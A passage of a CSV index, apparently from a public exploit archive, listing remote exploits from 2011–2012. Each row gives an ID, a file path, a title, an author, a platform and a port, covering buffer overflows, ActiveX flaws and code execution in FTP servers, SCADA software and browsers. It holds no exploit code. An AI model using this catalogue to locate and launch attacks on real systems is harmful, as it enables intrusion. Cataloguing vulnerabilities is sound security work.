Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote, -17044,exploits/windows/remote/17044.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe ovutil' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote, -17047,exploits/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe Hostname' CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote, -17048,exploits/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote, -17053,exploits/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote, -17058,exploits/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote, -17063,exploits/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote, -17068,exploits/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",multiple,remote, -17078,exploits/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution",2011-03-30,ikki,multiple,remote, -17104,exploits/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,windows,remote, -17105,exploits/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,windows,remote, -17181,exploits/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote, -17148,exploits/multiple/remote/17148.rb,"Zend Server Java Bridge - Arbitrary Java Code Execution (Metasploit)",2011-04-05,Metasploit,multiple,remote,10001 -17149,exploits/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution (Metasploit)",2011-04-09,Metasploit,windows,remote, -17151,exploits/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow (Metasploit)",2011-04-04,Metasploit,windows,remote,25 -17152,exploits/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution (Metasploit)",2011-04-08,Metasploit,windows,remote,9090 -17155,exploits/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution",2011-04-12,"Gerry Eisenhaur",windows,remote, -17156,exploits/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote, -17175,exploits/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption (Metasploit)",2011-04-16,Metasploit,windows,remote, -17187,exploits/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion (ASLR + DEP Bypass)",2011-04-19,Abysssec,windows,remote, -17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,windows,remote, -17199,exploits/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution (Metasploit)",2011-04-21,Metasploit,unix,remote, -17219,exploits/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)",2011-04-27,Metasploit,windows,remote,18821 -17243,exploits/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Remote Buffer Overflow",2011-05-04,xsploitedsec,windows,remote, -17240,exploits/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb & bls",windows,remote, -17244,exploits/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote, -17252,exploits/windows/remote/17252.rb,"VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote, -17268,exploits/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote, -17269,exploits/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,windows,remote, -17279,exploits/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote, -17290,exploits/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0/2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote, -17300,exploits/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote, -17304,exploits/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote, -17328,exploits/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote, -17345,exploits/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)",2011-05-29,fdiskyou,windows,remote, -17339,exploits/windows/remote/17339.py,"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)",2011-05-28,fdiskyou,windows,remote, -17352,exploits/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)",2011-05-30,Metasploit,windows,remote, -17354,exploits/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,windows,remote, -17355,exploits/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21 -17356,exploits/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote, -17359,exploits/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow",2011-06-03,mr.pr0n,windows,remote, -17361,exploits/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous",windows,remote, -17365,exploits/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM",2011-06-07,"Jeremy Brown",windows,remote, -17366,exploits/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute (Metasploit)",2011-06-06,Metasploit,windows,remote, -17373,exploits/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,windows,remote, -17374,exploits/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow (Metasploit)",2011-06-09,Metasploit,windows,remote, -17381,exploits/windows/remote/17381.txt,"Simple Web Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote, -17456,exploits/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - 'streamprocess.exe' Remote Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote, -17392,exploits/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,windows,remote, -17409,exploits/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)",2011-06-17,Metasploit,windows,remote, -17415,exploits/windows/remote/17415.rb,"Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)",2011-06-20,mr_me,windows,remote, -17416,exploits/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote, -17417,exploits/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow (Metasploit)",2011-06-20,Metasploit,windows,remote, -17419,exploits/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,windows,remote, -17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote, -17424,exploits/windows/remote/17424.rb,"Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit)",2011-06-21,Metasploit,windows,remote, -17429,exploits/windows/remote/17429.rb,"FactoryLink - 'vrn.exe' Opcode 9 Buffer Overflow (Metasploit)",2011-06-21,Metasploit,windows,remote, -17430,exploits/windows/remote/17430.rb,"Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit)",2011-06-21,Metasploit,windows,remote, -17434,exploits/windows/remote/17434.rb,"RealWin SCADA Server - DATAC Login Buffer Overflow (Metasploit)",2011-06-22,Metasploit,windows,remote, -17438,exploits/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote, -17450,exploits/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote, -17448,exploits/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,windows,remote, -17460,exploits/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote, -17462,exploits/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Command Execution",2011-06-30,kingcope,freebsd,remote, -17467,exploits/windows/remote/17467.rb,"HP - 'OmniInet.exe' Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555 -17468,exploits/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts & dookie",windows,remote,5555 -17490,exploits/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Remote Buffer Overflow (Metasploit)",2011-07-04,Metasploit,windows,remote, -17491,exploits/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,Metasploit,unix,remote, -17498,exploits/windows/remote/17498.rb,"Freefloat FTP Server - Remote Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote, -17507,exploits/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote, -39661,exploits/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Remote Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 -39662,exploits/windows/remote/39662.rb,"PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,21 -17513,exploits/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Remote Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote, -17517,exploits/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - Man In The Middle",2011-07-09,Nibin,windows,remote, -17519,exploits/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Remote Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote, -17520,exploits/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)",2011-07-10,Metasploit,windows,remote, -17527,exploits/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote, -17535,exploits/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote, -17537,exploits/windows/remote/17537.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote, -17539,exploits/windows/remote/17539.rb,"Freefloat FTP Server 1.0 - 'MKD' Remote Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote, -17540,exploits/windows/remote/17540.rb,"Freefloat FTP Server - 'MKD' Remote Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote, -17543,exploits/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow (Metasploit)",2011-07-17,Metasploit,windows,remote, -17546,exploits/windows/remote/17546.py,"Freefloat FTP Server 1.0 - 'REST' / 'PASV' Remote Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote, -17548,exploits/windows/remote/17548.rb,"Freefloat FTP Server - 'REST' Remote Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote, -17550,exploits/windows/remote/17550.py,"Freefloat FTP Server 1.0 - 'ACCL' Remote Buffer Overflow",2011-07-19,mortis,windows,remote, -17557,exploits/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote, -17575,exploits/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,windows,remote, -17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote, -17581,exploits/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote, -17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,windows,remote, -17612,exploits/windows/remote/17612.rb,"Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote, -17614,exploits/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",hp-ux,remote, -17619,exploits/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",windows,remote, -17635,exploits/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote, -17636,exploits/hardware/remote/17636.rb,"HP JetDirect PJL - Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote, -17645,exploits/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote, -17648,exploits/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Command Execution",2011-08-10,SZ,linux,remote, -17649,exploits/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote, -17650,exploits/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote, -17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote, -17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,windows,remote, -17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote, -17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote, -17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,windows,remote, -17691,exploits/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,multiple,remote, -17692,exploits/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote, -17697,exploits/windows/remote/17697.rb,"HP Easy Printer Care - XMLSimpleAccessor Class ActiveX Control Remote Code Execution (Metasploit)",2011-08-20,Metasploit,windows,remote, -17699,exploits/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote, -17700,exploits/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote, -17719,exploits/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,windows,remote, -17721,exploits/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow",2011-08-26,"Canberk BOLAT",windows,remote, -17762,exploits/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,windows,remote, -17810,exploits/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote, -17819,exploits/windows/remote/17819.py,"KnFTP Server - Remote Buffer Overflow",2011-09-12,blake,windows,remote, -17827,exploits/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - 'Coreservice.exe' Remote Stack Buffer Overflow (Metasploit)",2011-09-12,Metasploit,windows,remote, -17848,exploits/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution (Metasploit)",2011-09-16,Metasploit,windows,remote, -17849,exploits/windows/remote/17849.rb,"RealNetworks Realplayer - QCP Parsing Heap Overflow (Metasploit)",2011-09-17,Metasploit,windows,remote, -17855,exploits/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow (Metasploit)",2011-09-18,Metasploit,windows,remote, -17870,exploits/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote, -17876,exploits/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote, -17883,exploits/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote, -17884,exploits/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote, -17886,exploits/windows/remote/17886.py,"Freefloat FTP Server - Remote Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote, -17904,exploits/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote, -17936,exploits/windows/remote/17936.rb,"Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote, -17948,exploits/windows/remote/17948.rb,"ScriptFTP 3.3 - LIST Remote Buffer Overflow (Metasploit) (2)",2011-10-09,Metasploit,windows,remote, -17969,exploits/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote, -17960,exploits/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote, -17974,exploits/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote, -17975,exploits/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote, -17976,exploits/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote, -17977,exploits/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Command Execution",2011-10-11,kingcope,windows,remote, -17986,exploits/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote, -17993,exploits/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote, -18015,exploits/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metasploit)",2011-10-20,Metasploit,cgi,remote, -18016,exploits/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,windows,remote, -18051,exploits/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote, -18057,exploits/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote, -18062,exploits/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote, -18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",hardware,remote, -18089,exploits/windows/remote/18089.rb,"KnFTP 1.0 - Remote Buffer Overflow (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote, -18092,exploits/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote, -18093,exploits/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure",2011-11-07,"David Maman",windows,remote, -18102,exploits/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)",2011-11-09,Node,windows,remote, -18123,exploits/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)",2011-11-17,Metasploit,windows,remote, -18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,windows,remote, -18134,exploits/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)",2011-11-20,Metasploit,windows,remote, -18138,exploits/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote, -18145,exploits/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote, -18171,exploits/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote, -18172,exploits/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote, -18179,exploits/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote, -18181,exploits/freebsd/remote/18181.txt,"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution",2011-12-01,kingcope,freebsd,remote, -18182,exploits/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote, -18183,exploits/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote, -18187,exploits/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Buffer Overflow",2011-12-01,"Celil Ünüver",windows,remote, -18189,exploits/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",windows,remote, -18190,exploits/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote, -18235,exploits/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote, -18240,exploits/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit)",2011-12-13,Metasploit,windows,remote, -18280,exploits/linux/remote/18280.c,"TelnetD encrypt_keyid - Function Pointer Overwrite",2011-12-26,"NighterMan & BatchDrake",linux,remote, -18283,exploits/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote, -18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,hardware,remote, -18984,exploits/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote, -18345,exploits/windows/remote/18345.py,"TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow",2012-01-10,b33f,windows,remote, -18354,exploits/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter)",2012-01-12,TheXero,windows,remote, -18376,exploits/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote, -18365,exploits/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote, -18367,exploits/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote, -18368,exploits/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Remote Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote, -18369,exploits/bsd/remote/18369.rb,"FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote, -18377,exploits/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote, -18381,exploits/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote, -18382,exploits/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote, -18388,exploits/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote, -18393,exploits/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution (Metasploit)",2012-01-20,Metasploit,linux,remote, -18397,exploits/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution",2012-01-20,Abysssec,windows,remote, -18401,exploits/windows/remote/18401.py,"Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote, -18697,exploits/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Remote Buffer Overflow (Metasploit)",2012-04-04,Metasploit,windows,remote, -18420,exploits/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote, -18423,exploits/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote, -18426,exploits/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,windows,remote, -18437,exploits/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote, -18442,exploits/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote, -18446,exploits/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote, -18448,exploits/windows/remote/18448.rb,"Sunway ForceControl - SNMP 'NetDBServer.exe' Opcode 0x57 (Metasploit)",2012-02-02,Metasploit,windows,remote, -18449,exploits/windows/remote/18449.rb,"Icona SpA C6 Messenger - DownloaderActiveX Control Arbitrary File Download and Execute (Metasploit)",2012-02-02,Metasploit,windows,remote, -18476,exploits/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",windows,remote, -18478,exploits/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote, -18479,exploits/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote, -18485,exploits/windows/remote/18485.rb,"Java MixerSequencer Object - GM_Song Structure Handling (Metasploit)",2012-02-16,Metasploit,windows,remote, -18492,exploits/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution (Metasploit)",2012-02-17,Metasploit,linux,remote, -18520,exploits/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,windows,remote, -18514,exploits/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Remote Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote, -18521,exploits/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote, -18531,exploits/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow",2012-02-27,pa_kt,windows,remote, -18534,exploits/windows/remote/18534.py,"Sysax Multi Server 